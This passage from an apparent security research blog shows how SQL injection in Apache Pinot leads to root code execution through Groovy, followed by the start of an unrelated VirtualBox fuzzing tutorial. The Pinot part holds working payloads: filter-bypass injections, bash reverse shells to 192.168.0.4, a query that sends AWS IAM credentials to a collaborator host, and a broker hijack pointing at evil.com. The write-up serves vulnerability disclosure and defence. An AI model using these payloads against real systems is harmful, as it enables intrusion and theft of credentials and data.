enables the owner of a restaurant to get insights from Uber Eats orders regarding customer satisfaction, popular menu items, sales, and service quality analysis. Pinot enables slicing and dicing the raw data in different ways and supports low latency queries…

Essential Architectural Details

Pinot is written in Java.

Table data is partitioned / sharded into Segments, usually split based on timestamp, which can be stored in different places.

Apache Pinot is a cluster formed of different components, the essential ones being Controllers, Servers and Brokers.

Server

The Server stores segments of data. It receives SQL queries via gRPC, executes them and returns the results.

Broker

The Broker has an exposed HTTP port which clients send queries to. The Broker analyses the query and queries the Servers which have the required segments of data via gRPC. The client receives the results consolidated into a single response.

Controller

Maintains cluster metadata and manages other components. It serves admin endpoints and endpoints for uploading data.

Zookeeper

Apache Zookeeper is used to store cluster state and metadata. There may be multiple brokers, servers and controllers (LinkedIn claims to have more than 1000 nodes in a cluster), so Zookeeper is used to keep track of these nodes and which servers host which segments. Essentially it’s a hierarchical key-value store.

Setting Up a Test Environment

Following the Kubernetes quickstart in Minikube is an easy way to create a multi-node environment. The documentation walks through the steps to install the Pinot Helm chart, set up ingestion via Kafka, and expose port 9000 of the Controller to access the query editor and cluster management UI. If things break horrifically, you can just minikube delete to wipe everything and start again.

The only recommendations are to:

Set image.tag in kubernetes/helm/pinot/values.yaml to a specific Pinot release (e.g. release-0.10.0) rather than latest to test a specific version.
Install the Pinot chart from ./kubernetes/helm/pinot to use your local configuration changes rather than pinot/pinot which fetches values from the Github master branch.
Use stern -n pinot-quickstart pinot to tail logs from all nodes.

Pinot SQL Syntax & Injection Basics

While Pinot syntax is based on Apache Calcite, many features in the Calcite reference are unsupported in Pinot. Here are some useful language features which may help to identify and test a Pinot backend.

Strings

Strings are surrounded by single-quotes. Single-quotes can be escaped with another single-quote. Double quotes denote identifiers e.g. column names.

String concatenation

Performed by the 3-parameter function CONCAT(str1, str2, separator). The + sign only works with numbers.

SELECT "someColumn", 'a ''string'' with quotes', CONCAT('abc','efg','d') FROM myTable
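Since CONCAT only joins two strings at a time, longer strings have to be built by nesting calls. Here is a minimal Python sketch of generating such an expression. The helper names quote_literal and concat_chain are our own and are not part of Pinot or any of its clients.

```python
from functools import reduce


def quote_literal(value):
    """Wrap value in single quotes, doubling any embedded single quotes."""
    return "'" + value.replace("'", "''") + "'"


def concat_chain(fragments):
    """Fold fragments into nested 3-parameter CONCAT calls with an empty separator."""
    if not fragments:
        raise ValueError("need at least one fragment")
    quoted = [quote_literal(f) for f in fragments]
    # CONCAT(CONCAT(a, b, ''), c, '') and so on, left to right
    return reduce(lambda acc, nxt: f"CONCAT({acc},{nxt},'')", quoted[1:], quoted[0])


print(quote_literal("a 'string' with quotes"))
print(concat_chain(["abc", "it's", "efg"]))
```

A single fragment is returned as a plain quoted literal, so the helper never emits a CONCAT call with fewer than three arguments.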

Substrings

SUBSTR(col, startIndex, endIndex) where indexes start at 0 and can be negative to count from the end. This is different from Postgres and MySQL where the last parameter is a length.

SELECT SUBSTR('abcdef', -3, -1) FROM ignoreMe -- 'def'

Length

LENGTH(str)

Comments

Line comments -- do not require surrounding whitespace. Multiline comments /* */ raise an error if the closing */ is missing.

Filters

Basic WHERE filters need to reference a column. Filters which do not operate on any column will raise errors, so SQLi payloads such as ' OR ''=' will fail:

SELECT * FROM airlineStatsAvro
WHERE 1 = 1
-- QueryExecutionError:
-- java.lang.NullPointerException: ColumnMetadata for 1 should not be null.
-- Potentially invalid column name specified.
SELECT * FROM airlineStatsAvro
WHERE year(NOW()) > 0
-- QueryExecutionError:
-- java.lang.NullPointerException: ColumnMetadata for 2022 should not be null.
-- Potentially invalid column name specified.

As long as you know a valid column name, you can still return all records e.g.:

SELECT * FROM airlineStatsAvro
WHERE 0 = Year - Year AND ArrTimeBlk != 'blahblah-bc'

BETWEEN

SELECT * FROM transcript WHERE studentID between 201 and 300

IN

Use col IN (literal1, literal2, ...).

SELECT * FROM transcript WHERE UPPER(firstName) IN ('NICK','LUCY')

String Matching

In LIKE filters, % and _ are converted to regular expression patterns .* and .

The REGEXP_LIKE(col, regex) function uses a java.util.regex.Pattern case-insensitive regular expression.

WHERE REGEXP_LIKE(alphabet, '^a[Bcd]+.*z$')

Both methods are vulnerable to Denial of Service (DoS) if users can provide their own unsanitised search queries e.g.:

LIKE '%%%%%%%%%%%%%zz'
REGEXP_LIKE(col, '((((((.*)*)*)*)*)*)*zz')

These filters will run on the Pinot server at close to 100% CPU forever (OK, for a very very long time depending on the data in the column).
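The LIKE translation described above can be modelled in a few lines of Python. This is only a sketch: the anchoring with ^ and $ and the escaping of other characters are our assumptions, not taken from Pinot's source. The collapse_wildcards helper is one possible mitigation an API could apply before passing a search term on. It leaves the meaning of the pattern unchanged, but it only reduces the backtracking for LIKE and does nothing for user-supplied regular expressions.

```python
import re


def like_to_regex(pattern):
    """Translate a LIKE pattern: % becomes .*, _ becomes ., the rest is literal."""
    out = []
    for ch in pattern:
        if ch == "%":
            out.append(".*")
        elif ch == "_":
            out.append(".")
        else:
            out.append(re.escape(ch))
    # Anchoring is an assumption made for this model
    return "^" + "".join(out) + "$"


def collapse_wildcards(pattern):
    """Replace runs of % with a single %, which matches the same strings."""
    return re.sub(r"%+", "%", pattern)


print(like_to_regex("%%%zz"))
print(like_to_regex(collapse_wildcards("%%%%%%%%%%%%%zz")))
```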

UNION

No.

Stacked / Batched Queries

Nope.

JOIN

Limited support for joins is in development. Currently it is possible to join with offline tables with the lookUp function.

Subqueries

Limited support. The subquery is supposed to return a base64-encoded IdSet. An IdSet is a data structure (compressed bitmap or Bloom filter) where it is very fast to check if an Id belongs in the IdSet. The IN_SUBQUERY (filtered on Broker) or IN_PARTITIONED_SUBQUERY (filtered on Server) functions perform the subquery and then use this IdSet to filter results from the main query.

WHERE IN_SUBQUERY(
  yearID,
  'SELECT ID_SET(yearID) FROM baseballStats WHERE teamID = ''BC'''
  ) = 1

Database Version

It is common to SELECT @@VERSION or SELECT VERSION() when fingerprinting database servers. Pinot lacks this feature. Instead, the presence or absence of functions and other language features must be used to identify a Pinot server version.

Information Schema Tables

No.

Data Types

Some Pinot functions are sensitive to the column types in use (INT, LONG, BYTES, STRING, FLOAT, DOUBLE). The hash functions like SHA512, for instance, will only operate on BYTES columns and not STRING columns. Luckily, we can find the undocumented toUtf8 function in the source code and convert strings into bytes:

SELECT md5(toUtf8(somestring)) FROM table

CASE

Simple case:

SELECT
  CASE firstName WHEN 'Lucy' THEN 1 WHEN 'Bob', 'Nick' THEN 2 ELSE 'x' END
FROM transcript

Searched case:

SELECT
  CASE WHEN firstName = 'Lucy' THEN 1 WHEN firstName = 'Bob' THEN 2.1 ELSE 'x' END
FROM transcript

Query Options

Certain query options such as timeouts can be added with OPTION(key=value,key2=value2). Strangely enough, this can be added anywhere inside the query, and I mean anywhere!

SELECT studentID, firstOPTION(timeoutMs=1)Name
froOPTION(timeoutMs=1)m tranOPTION(timeoutMs=2)script
WHERE firstName OPTION(timeoutMs=1000) = 'Lucy'
-- succeeds as the final timeoutMs is long (1000ms)

SELECT * FROM transcript WHERE REGEXP_LIKE(firstName, 'LuOPTION(timeoutMs=1)cy')
-- BrokerTimeoutError:
-- Query timed out (time spent: 4ms, timeout: 1ms) for table: transcript_OFFLINE before scattering the request
--
-- With timeout 10ms, the error is:
-- 427: 1 servers [pinot-server-0_O] not responded
--
-- With an even larger timeout value the query succeeds and returns results for 'Lucy'.

Yes, even inside strings!

In a Pinot-backed search API, queries for thingumajig and thinguOPTION(a=b)majig should return identical results, assuming the characters ()= are not filtered by the API.

This is also potentially a useful WAF bypass.

CTF-grade SQL injection

In far-fetched scenarios, this could be used to comment out parts of a SQL query, e.g. a route /getFiles?category=)&title=%25oPtIoN( using a prepared statement to produce the SQL:

SELECT * FROM gchqFiles
WHERE
  title LIKE '%oPtIoN('
  and topSecret = false
  and category LIKE ')'

Everything between OPTION( and the next ) is stripped out using regex /option\s*\([^)]+\)/i. The query gets executed as:

SELECT * FROM gchqFiles
WHERE
  title LIKE '%'

allowing access to all the top secret files!
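To check a payload before sending it, the stripping step can be reproduced locally. The Python sketch below models only the removal of OPTION(...) spans, using a case-insensitive regex equivalent to the one described above. It does not model how Pinot then parses the key=value pairs, and the name strip_options is ours.

```python
import re

# OPTION, optional whitespace, then everything up to the next closing parenthesis
OPTION_RE = re.compile(r"option\s*\([^)]+\)", re.IGNORECASE)


def strip_options(sql):
    """Remove every OPTION(...) span, wherever it appears in the query text."""
    return OPTION_RE.sub("", sql)


query = (
    "SELECT * FROM gchqFiles\n"
    "WHERE\n"
    "  title LIKE '%oPtIoN('\n"
    "  and topSecret = false\n"
    "  and category LIKE ')'"
)
print(strip_options(query))
print(strip_options("thinguOPTION(a=b)majig"))
```

Because the character class [^)] also matches newlines, a single span can swallow several lines of the query, which is what removes the topSecret condition here.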

Note that the error "OPTION statement requires two parts separated by '='" occurs if the number of equals signs inside the OPTION() is wrong.

Another contrived scenario could result in SQLi and a filter bypass.

SELECT * FROM gchqFiles
WHERE
  REGEXP_LIKE(title, 'oPtIoN(a=b')
  and not topSecret
  and category = ') OR id - id = 0--'

will be processed as

SELECT * FROM gchqFiles
WHERE
  REGEXP_LIKE(title, '
  and not topSecret
  and category = ') OR id - id = 0

Timeouts

Timeouts do not work. While the Broker returns a timeout exception to the client when the query timeout is reached, the Server continues processing the query row by row until completion, however long that takes. There is no way to cancel an in-progress query besides killing the Server process.

SQL Injection in Pinot

To proceed, you’ll need a SQL injection vulnerability, as with any other type of database backend: one where malicious user input can wind up in the query body rather than being sent as parameters with prepared statements.

Pinot backends do not support prepared statements, but the Java client has a PreparedStatement class which escapes single quotes before sending the request to the Broker and can prevent SQLi (except the OPTION() variety).

Injection may appear in a search query such as:

query = """SELECT order_id, order_details_json FROM orders
WHERE store_id IN ({stores})
  AND REGEXP_LIKE(product_name,'{query}')
  AND refunded = false""".format(
    stores=user.stores,
    query=request.query,
)

The query parameter can be abused for SQL injection to return all orders in the system without the restriction to specific store IDs. An example payload is !xyz') OR store_id - store_id = 0 OR (product_name = 'abc! which will produce the following SQL query:

SELECT order_id, order_details_json FROM orders
WHERE store_id IN (12, 34, 56)
  AND REGEXP_LIKE(product_name,'!xyz') OR store_id - store_id = 0 OR (product_name = 'abc!')
  AND refunded = false

The logical split happens on the OR, so records will be returned if either:

store_id IN (12, 34, 56) AND REGEXP_LIKE(product_name,'!xyz') (unlikely to have any results)
store_id - store_id = 0 (always true, so all records are returned)
(product_name = 'abc!') AND refunded = false (unlikely to have any results)

If the query template used by the target has no new lines, the query can alternatively be ended with a line comment !xyz') OR store_id - store_id = 0--.
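The vulnerable template and payload above are easy to reproduce offline. The Python sketch below renders the query twice: once with raw interpolation, and once with single quotes doubled, which is roughly what the Java client's PreparedStatement is described as doing. The function names are hypothetical. Quote doubling alone does not stop the OPTION() variety of injection.

```python
TEMPLATE = """SELECT order_id, order_details_json FROM orders
WHERE store_id IN ({stores})
  AND REGEXP_LIKE(product_name,'{query}')
  AND refunded = false"""


def build_unsafe(stores, query):
    """Interpolate user input directly, as in the vulnerable example."""
    return TEMPLATE.format(stores=", ".join(str(s) for s in stores), query=query)


def build_escaped(stores, query):
    """Double single quotes in the search term and force store IDs to integers."""
    safe_query = query.replace("'", "''")
    return TEMPLATE.format(stores=", ".join(str(int(s)) for s in stores), query=safe_query)


payload = "!xyz') OR store_id - store_id = 0 OR (product_name = 'abc!"
print(build_unsafe([12, 34, 56], payload))
print(build_escaped([12, 34, 56], payload))
```

In the escaped version the whole payload stays inside one string literal, so the OR conditions never reach the WHERE clause.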

RCE via Groovy

While maturity is bringing improvements, secure design has not always been a priority. Pinot trusts anyone who can query the database to also execute code on the Server, as root 😲. This ~~feature~~ gaping security hole is enabled by default in all released versions of Apache Pinot. It was disabled by default in a commit on May 17, 2022 but this commit has not yet made it into a release.

Scripts are written in the Groovy language. This is a JVM-based language, allowing you to use all your favourite Java methods. Here’s some Groovy syntax you might care about:

// print to Server log (only going to be useful when testing locally)
println 3
// make a variable
def data = 'abc'
// interpolation by using double quotes and $ARG or ${ARG}
def moredata = "${data}def"  // abcdef
// execute shell command, wait for completion and then return stdout
'whoami'.execute().text
// launch shell command, but do not wait for completion
"touch /tmp/$arg0".execute()
// execute shell command with array syntax, helps avoid quote-escaping hell
["bash", "-c", "bash -i >& /dev/tcp/192.168.0.4/53 0>&1 &"].execute()
// a semicolon must be placed after the final closing bracket of an if-else block
if (true) { a() } else { b() }; return "a"

To execute Groovy, use:

GROOVY(
  '{"returnType":"INT or STRING or some other data type","isSingleValue":true}',
  'groovy code on one line',
  MaybeAColumnName,
  MaybeAnotherColumnName
)

If columns (or transform functions) are specified after the groovy code, they appear as variables arg0, arg1, etc. in the Groovy script.
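The call has three layers of quoting to get right: JSON metadata, a one-line script, and SQL string literals around both. The Python sketch below assembles the expression with a harmless script. The helper groovy_call is our own illustration and not part of any Pinot client.

```python
import json


def groovy_call(return_type, script, *columns):
    """Build a GROOVY(...) expression: JSON metadata, one-line script, optional columns."""
    if "\n" in script:
        raise ValueError("the script must fit on one line")
    metadata = json.dumps(
        {"returnType": return_type, "isSingleValue": True}, separators=(",", ":")
    )
    # Metadata and script are SQL string literals, so single quotes are doubled
    args = [
        "'" + metadata.replace("'", "''") + "'",
        "'" + script.replace("'", "''") + "'",
    ]
    args.extend(columns)  # columns surface as arg0, arg1, ... inside the script
    return "GROOVY(" + ", ".join(args) + ")"


print(groovy_call("INT", "arg0 + 1", "studentID"))
```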

RCE Example Queries

Whoami

SELECT * FROM myTable WHERE groovy(
  '{"returnType":"INT","isSingleValue":true}',
  'println "whoami".execute().text; return 1'
) = 1 limit 5

Prints root to the log! The official Pinot docker images run Groovy scripts as root.

Note that:

The Groovy function is an exception to the earlier rule requiring filters to include a column name.
Even though the limit is 5, every row in each segment being searched is processed. Once 5 rows are reached, the query returns results to the Broker, but the root lines continue being printed to the log.
The return and comparison values need not be the same. However the types must match returnType in the metadata JSON (here INT).
The return keyword is optional for the final statement, so the script could end with ; 1.

SELECT * FROM myTable WHERE groovy(
  '{"returnType":"INT","isSingleValue":true}',
  'println "hello $arg0"; "touch /tmp/id-$arg0".execute(); 42',
  id
) = 3

In /tmp, expect root-owned files id-1, id-2, id-3, etc. for each row.

AWS

Steal temporary AWS IAM credentials from pinot-server.

SELECT * FROM myTable WHERE groovy(
  '{"returnType":"INT","isSingleValue":true}',
  CONCAT(CONCAT(CONCAT(CONCAT(
    'def aws = "169.254.169.254/latest/meta-data/iam/security-credentials/";',
    'def collab = "xyz.burpcollaborator.net/";',
''),'def role = "curl -s ${aws}".execute().text.split("\n")[0].trim();',
''),'def creds = "curl -s ${aws}${role}".execute().text;',
''),'["curl", collab, "--data", creds].execute(); 0',
  '')
) = 1

Could give access to cloud resources like S3. The code can of course be adapted to work with IMDSv2.

Reverse Shell

The goal is really to have a root shell from which to explore the cluster at your leisure without your commands appearing in query logs. You can use the following:

SELECT * FROM myTable WHERE groovy(
  '{"returnType":"INT","isSingleValue":true}',
  '["bash", "-c", "bash -i >& /dev/tcp/192.168.0.4/443 0>&1 &"].execute(); return 1'
) = 1

to spawn loads of reverse shells at the same time, one per row.

root@pinot-server-1:/opt/pinot#

You will be root on whichever Server instances are chosen by the broker based on which Servers contain the required table segments for the query.

SELECT * FROM myTable WHERE groovy(
  '{"returnType":"STRING","isSingleValue":true}',
  '["bash", "-c", "bash -i >& /dev/tcp/192.168.0.4/4444 0>&1 &"].execute().text'
) = 'x'

This launches one reverse shell. If you accidentally kill the shell, however far into the future, a new reverse shell attempt will be spawned as the Server processes the next row. Yes, the client and Broker will see the query timeout, but the Server will continue executing the query until completion.

Tuning

When coming across Pinot for the first time on an engagement, we used a Groovy query similar to the AWS one above. However, as you can already guess, this launched tens of thousands of requests at Burp Collaborator over a span of several hours with no way to stop the runaway query besides confessing our sin to the client.

To avoid spawning thousands of processes and causing performance degradation and potentially a Denial of Service, limit execution to a single row with an if statement in Groovy.

SELECT * FROM myTable WHERE groovy(
  '{"returnType":"INT","isSingleValue":true}',
  CONCAT(CONCAT(CONCAT(CONCAT(
    'if (arg0 == "489") {',
    '["bash", "-c", "bash -i >& /dev/tcp/192.168.0.4/4444 0>&1 &"].execute();',
''),'return 1;',
''),'};',
''),'return 0',
  ''),
  id
) = 1

A reverse shell is spawned only for the one row with id 489.

Use RCE on Server to Attack Other Nodes

We have root access to a Server via our reverse shell, giving us access to:

All the segment data stored on the Server
Configuration and environment variables with the locations of other services such as Broker and Zookeeper
Potentially keys to the cloud environment with juicy IAM permissions

As we’re root here already, let’s try to use our foothold to affect other parts of the Pinot cluster such as Zookeeper, Brokers, Controllers, and other Servers.

First we should check the configuration.

root@pinot-server-1:/opt/pinot# cat /proc/1/cmdline | sed 's/\x00/ /g'
/usr/local/openjdk-11/bin/java -Xms512M ... -Xlog:gc*:file=/opt/pinot/gc-pinot-server.log -Dlog4j2.configurationFile=/opt/pinot/conf/log4j2.xml -Dplugins.dir=/opt/pinot/plugins -Dplugins.dir=/opt/pinot/plugins -classpath /opt/pinot/lib/*:...:/opt/pinot/plugins/pinot-file-system/pinot-s3/pinot-s3-0.10.0-SNAPSHOT-shaded.jar -Dapp.name=pinot-admin -Dapp.pid=1 -Dapp.repo=/opt/pinot/lib -Dapp.home=/opt/pinot -Dbasedir=/opt/pinot org.apache.pinot.tools.admin.PinotAdministrator StartServer -clusterName pinot -zkAddress pinot-zookeeper:2181 -configFileName /var/pinot/server/config/pinot-server.conf

We have a Zookeeper address -zkAddress pinot-zookeeper:2181 and config file location -configFileName /var/pinot/server/config/pinot-server.conf. The file contains data locations and auth tokens in the unlikely event that internal cluster authentication has been enabled.

Zookeeper

It is likely that the locations of other services are available as environment variables, however the source of truth is Zookeeper. Nodes must be able to read and write to Zookeeper to update their status.

root@pinot-server-1:/opt/pinot# cd /tmp
root@pinot-server-1:/tmp# wget -q https://dlcdn.apache.org/zookeeper/zookeeper-3.8.0/apache-zookeeper-3.8.0-bin.tar.gz && tar xzf apache-zookeeper-3.8.0-bin.tar.gz
root@pinot-server-1:/tmp# ./apache-zookeeper-3.8.0-bin/bin/zkCli.sh -server pinot-zookeeper:2181
Connecting to pinot-zookeeper:2181
...
2022-06-06 20:53:52,385 [myid:pinot-zookeeper:2181] - INFO  [main-SendThread(pinot-zookeeper:2181):o.a.z.ClientCnxn$SendThread@1444] - Session establishment complete on server pinot-zookeeper/10.103.140.149:2181, session id = 0x10000046bac0016, negotiated timeout = 30000
...
[zk: pinot-zookeeper:2181(CONNECTED) 0] ls /pinot/CONFIGS/PARTICIPANT
[Broker_pinot-broker-0.pinot-broker-headless.pinot-quickstart.svc.cluster.local_8099, Controller_pinot-controller-0.pinot-controller-headless.pinot-quickstart.svc.cluster.local_9000, Minion_pinot-minion-0.pinot-minion-headless.pinot-quickstart.svc.cluster.local_9514, Server_pinot-server-0.pinot-server-headless.pinot-quickstart.svc.cluster.local_8098, Server_pinot-server-1.pinot-server-headless.pinot-quickstart.svc.cluster.local_8098]
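Judging by this listing, participant names follow a Role_host_port layout. That is an inference from the output above rather than a documented format. Under that assumption, a short Python sketch can turn the listing into something easier to filter:

```python
from typing import NamedTuple


class Participant(NamedTuple):
    role: str
    host: str
    port: int


def parse_participant(name):
    """Split 'Role_host_port' on the first and last underscore."""
    role, rest = name.split("_", 1)
    host, port = rest.rsplit("_", 1)
    return Participant(role, host, int(port))


# Shortened copy of the zkCli output above
listing = (
    "[Broker_pinot-broker-0.pinot-broker-headless.pinot-quickstart.svc.cluster.local_8099, "
    "Server_pinot-server-0.pinot-server-headless.pinot-quickstart.svc.cluster.local_8098]"
)
participants = [parse_participant(n) for n in listing.strip("[]").split(", ")]
brokers = [p for p in participants if p.role == "Broker"]
print(brokers)
```

Splitting on the first and last underscore means a hostname that itself contains underscores would still parse.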

Now we have the list of “participants” in our Pinot cluster. We can get the configuration of a Broker:

[zk: pinot-zookeeper:2181(CONNECTED) 1] get /pinot/CONFIGS/PARTICIPANT/Broker_pinot-broker-0.pinot-broker-headless.pinot-quickstart.svc.cluster.local_8099
{
  "id" : "Broker_pinot-broker-0.pinot-broker-headless.pinot-quickstart.svc.cluster.local_8099",
  "simpleFields" : {
    "HELIX_ENABLED" : "true",
    "HELIX_ENABLED_TIMESTAMP" : "1654547467392",
    "HELIX_HOST" : "pinot-broker-0.pinot-broker-headless.pinot-quickstart.svc.cluster.local",
    "HELIX_PORT" : "8099"
  },
  "mapFields" : { },
  "listFields" : {
    "TAG_LIST" : [ "DefaultTenant_BROKER" ]
  }
}

By modifying the broker HELIX_HOST in Zookeeper (using set), Pinot queries will be sent via HTTP POST to /query/sql on a machine you control rather than the real broker. You can then reply with your own results. While powerful, this is a rather disruptive attack.

In further mitigation, it will not affect services which send requests directly to a hardcoded Broker address. Many clients do rely on Zookeeper or the Controller to locate the broker, and these clients will be affected. We have not investigated whether intra-cluster mutual TLS would downgrade this attack to DoS.

Broker

We discovered the location of the broker. Its HELIX_PORT refers to an HTTP server used for submitting SQL queries:

curl -H "Content-Type: application/json" -X POST \
   -d '{"sql":"SELECT X FROM Y"}' \
   http://pinot-broker-0:8099/query/sql

Sending queries directly to the broker may be much easier than via the SQLi endpoint. Note that the broker may have basic auth enabled, but as with all Pinot services it is disabled by default.
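If curl is not available on the box, the same request can be put together with Python's standard library. This sketch only builds the request object and does not send it. The broker hostname is taken from the curl example above, and build_broker_request is a name we made up.

```python
import json
import urllib.request


def build_broker_request(broker_url, sql):
    """Prepare (but do not send) a POST to the Broker's /query/sql endpoint."""
    body = json.dumps({"sql": sql}).encode("utf-8")
    return urllib.request.Request(
        broker_url.rstrip("/") + "/query/sql",
        data=body,
        headers={"Content-Type": "application/json"},
        method="POST",
    )


req = build_broker_request("http://pinot-broker-0:8099", "SELECT X FROM Y")
print(req.get_method(), req.full_url)
# To actually send it: urllib.request.urlopen(req, timeout=10).read()
```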

All Pinot REST services also have an /appconfigs endpoint returning configuration, environment variables and java versions.

Other Servers

There may be data which is only present on other Servers. From your reverse shell, SQL queries can be sent to any other Server via GRPC without requiring authentication.

Alternatively, we can go back and use Pinot’s IdSet subquery functionality to get shells on other Servers. We do this by injecting an IN_SUBQUERY(columnName, subQuery) filter into our original query to tableA to produce SQL like:

SELECT * FROM tableA
  WHERE
    IN_SUBQUERY(
      'x',
      'SELECT ID_SET(firstName) FROM tableB WHERE groovy(''{"returnType":"INT","isSingleValue":true}'',''println "RCE";return 3'', studentID)=3'
    ) = true

It is important that the tableA column name (here the literal 'x') and the ID_SET column of the subquery have the same type. If an integer column from tableB is used instead of firstName, the 'x' must be replaced with an integer.

We now get RCE on the Servers holding segments of tableB.

Controller

The Controller also has a useful REST API.

It has methods for getting and setting data such as cluster configuration, table schemas, instance information and segment data.

It can be used to interact with Zookeeper e.g. to update the broker host, as was done directly via Zookeeper above.

curl -X PUT "http://localhost:9000/instances/Broker_pinot-broker-0.pinot-broker-headless.pinot-quickstart.svc.cluster.local_8099?updateBrokerResource=true" -H  "accept: application/json" -H  "Content-Type: application/json" -d "{  \"instanceName\": \"Broker_pinot-broker-0.pinot-broker-headless.pinot-quickstart.svc.cluster.local_8099\",  \"host\": \"evil.com\",  \"enabled\": true,  \"port\": \"8099\",  \"tags\": [\"DefaultTenant_BROKER\"],  \"type\":\"BROKER\",  \"pools\": null,  \"grpcPort\": -1,  \"adminPort\": -1,  \"systemResourceInfo\": null}"

Files can also be uploaded for ingestion into tables.

TLDR

Pinot is a modern database platform that can be attacked with old-school SQLi
SQL injection leads to Remote Code Execution by default in the latest release, at the time of writing
In the official container images, RCE means root on the Server component of the Pinot cluster
From here, other components can be affected to a certain degree
WTF is going on with OPTION()?
Pinot is under active development. Maturity will bring security improvements
In an upcoming release (>0.10.0) the SQLi to RCE footgun will be opt-in

Introduction to VirtualBox security research

2022-04-26T00:00:00+02:00

Introduction

This article introduces VirtualBox research and explains how to build a coverage-based fuzzer, focusing on the emulated network device drivers. In the examples below, we explain how to create a harness for the non-default network device driver PCNet. The example can be readily adjusted for a different network driver or even different device driver components.

We are aware that there are excellent resources related to this topic - see [1], [2]. However, these cover the fuzzing process from a high-level perspective or omit some important technical details. Our goal is to present all the necessary steps and code required to instrument and debug the latest stable version of VirtualBox (6.1.30 at the time of writing). As the SVN version is out-of-sync, we download the tarball instead.

In our setup, we use Ubuntu 20.04.3 LTS. As the VT-x/AMD-V feature is not fully supported for VirtualBox, we use a native host. When using a MacBook, the following guide enables a Linux installation to an external SSD.

VirtualBox uses the kBuild framework for building. As mentioned on their page, only a few (0.5) people on our planet understand it, but editing makefiles should be straightforward. As we will see later, after commenting out hardware-specific components, that’s indeed true.

kmk is a kBuild alternative for the make subsystem. It allows creating debug or release builds, depending on the supplied arguments. The debug build provides a robust logging mechanism, which we will describe next.

Note that in this article, we will use three different builds. The remaining two release builds are for fuzzing and coverage reporting. Because they involve modifying the source code, we use a separate directory for every instance.

Debug Build

The build instructions for Linux are described here. After installing all required dependencies, it’s enough to run the following commands:

$ ./configure --disable-hardening --disable-docs
$ source ./env.sh && kmk KBUILD_TYPE=debug

If successful, the VirtualBox binary will be created at out/linux.amd64/debug/bin/VirtualBox. Before creating our first guest machine, we have to compile and load the kernel modules:

$ VERSION=6.1.30
$ vbox_dir=~/VirtualBox-$VERSION-debug/
$ (cd $vbox_dir/out/linux.amd64/debug/bin/src/vboxdrv && sudo make && sudo insmod vboxdrv.ko)
$ (cd $vbox_dir/out/linux.amd64/debug/bin/src/vboxnetflt && sudo make && sudo insmod vboxnetflt.ko)
$ (cd $vbox_dir/out/linux.amd64/debug/bin/src/vboxnetadp && sudo make && sudo insmod vboxnetadp.ko)

VirtualBox defines the VBOXLOGGROUP enum inside include/VBox/log.h, which makes it possible to selectively enable logging for specific files or functionalities. Unfortunately, since the logging is intended for the debug builds, we could not enable this functionality in the release build without making many cumbersome changes.

Unlike the VirtualBox binary, the VBoxHeadless startup utility located in the same directory allows running the machines directly from the command-line interface. For illustration, we want to enable debugging for both this component and the PCNet network driver. First, we have to identify the entries of the VBOXLOGGROUP. They are defined using the LOG_GROUP_ string near the beginning of the file we wish to trace:

$ grep LOG_GROUP_ src/VBox/Frontends/VBoxHeadless/VBoxHeadless.cpp src/VBox/Devices/Network/DevPCNet.cpp

src/VBox/Frontends/VBoxHeadless/VBoxHeadless.cpp:#define LOG_GROUP LOG_GROUP_GUI
src/VBox/Devices/Network/DevPCNet.cpp:#define LOG_GROUP LOG_GROUP_DEV_PCNET

We redirect the output to the terminal instead of creating log files and specify the Log Group name, using the lowercased string from the grep output and without the prefix:

$ export VBOX_LOG_DEST="nofile stdout"
$ VBOX_LOG="+gui.e.l.f+dev_pcnet.e.l.f.l2" out/linux.amd64/debug/bin/VBoxHeadless -startvm vm-test

The VirtualBox logging facility and the meaning of all parameters are clarified here. The output is easy to grep, and it’s crucial for understanding the internal structures.
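When tracing more than a couple of files, deriving the group names by hand gets tedious. The Python sketch below applies the rule described above (drop the LOG_GROUP_ prefix, lowercase the rest) to the grep output and assembles the VBOX_LOG value. The helper names are ours, and the flags are simply the ones used in the example command.

```python
import re

DEFINE_RE = re.compile(r"#define\s+LOG_GROUP\s+LOG_GROUP_(\w+)")


def log_group_name(define_line):
    """Turn '#define LOG_GROUP LOG_GROUP_DEV_PCNET' into 'dev_pcnet'."""
    match = DEFINE_RE.search(define_line)
    if match is None:
        raise ValueError("no LOG_GROUP definition found")
    return match.group(1).lower()


def vbox_log_value(groups):
    """Join groups and their flags into the '+group.flag.flag' form used by VBOX_LOG."""
    return "".join("+" + ".".join([name, *flags]) for name, flags in groups.items())


grep_output = [
    "src/VBox/Frontends/VBoxHeadless/VBoxHeadless.cpp:#define LOG_GROUP LOG_GROUP_GUI",
    "src/VBox/Devices/Network/DevPCNet.cpp:#define LOG_GROUP LOG_GROUP_DEV_PCNET",
]
names = [log_group_name(line) for line in grep_output]
value = vbox_log_value({names[0]: ["e", "l", "f"], names[1]: ["e", "l", "f", "l2"]})
print(value)
```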

AFL instrumentation for afl-clang-fast / afl-clang-fast++

Installing Clang

For Ubuntu, we can follow the official instructions to install the Clang compiler. We used clang-12, because building was not possible with the previous version. Alternatively, clang-13 is supported too. After we are done, it is useful to verify the installation and create symlinks to ensure AFLplusplus will not complain about missing locations:

$ rehash
$ clang --version
$ clang++ --version
$ llvm-config --version
$ llvm-ar --version

$ sudo ln -sf /usr/bin/llvm-config-12 /usr/bin/llvm-config
$ sudo ln -sf /usr/bin/clang++-12 /usr/bin/clang++
$ sudo ln -sf /usr/bin/clang-12 /usr/bin/clang
$ sudo ln -sf /usr/bin/llvm-ar-12 /usr/bin/llvm-ar

Building AFLplusplus (AFL++)

Our fuzzer of choice was AFL++, although everything can be trivially reproduced with libFuzzer too. Since we don’t need the black box instrumentation, it’s enough to include the source-only parts:

$ git clone https://github.com/AFLplusplus/AFLplusplus
$ cd AFLplusplus

# use this revision if the VirtualBox compilation fails
$ git checkout 66ca8618ea3ae1506c96a38ef41b5f04387ab560

$ make source-only
$ sudo make install

Applying patches

To use clang for fuzzing, it’s necessary to create a new template kBuild/tools/AFL.kmk by using the vbox-fuzz/AFL.kmk file, available on https://github.com/doyensec/vbox-fuzz.

Moreover, we have to fix multiple issues related to undefined symbols or different commentary styles. The most important change is disabling the instrumentation for Ring-0 components (TEMPLATE_VBoxR0_TOOL). Otherwise it’s not possible to boot the guest machine. All these changes are included in the patch files.

Interestingly, when I was investigating the error message I obtained during the failed compilation, I found some recent slides from the HITB conference describing exactly the same issue. This was a confirmation that I was on the right track, and more people were trying the same approach. The slides also mention VBoxHeadless, which was a natural choice for a harness and the one we used too.

If the unmodified VirtualBox is located inside the ~/VirtualBox-6.1.30-release-afl directory, we run these commands to apply all necessary patches:

$ TO_PATCH=6.1.30
$ SRC_PATCH=6.1.30
$ cd ~/VirtualBox-$TO_PATCH-release-afl

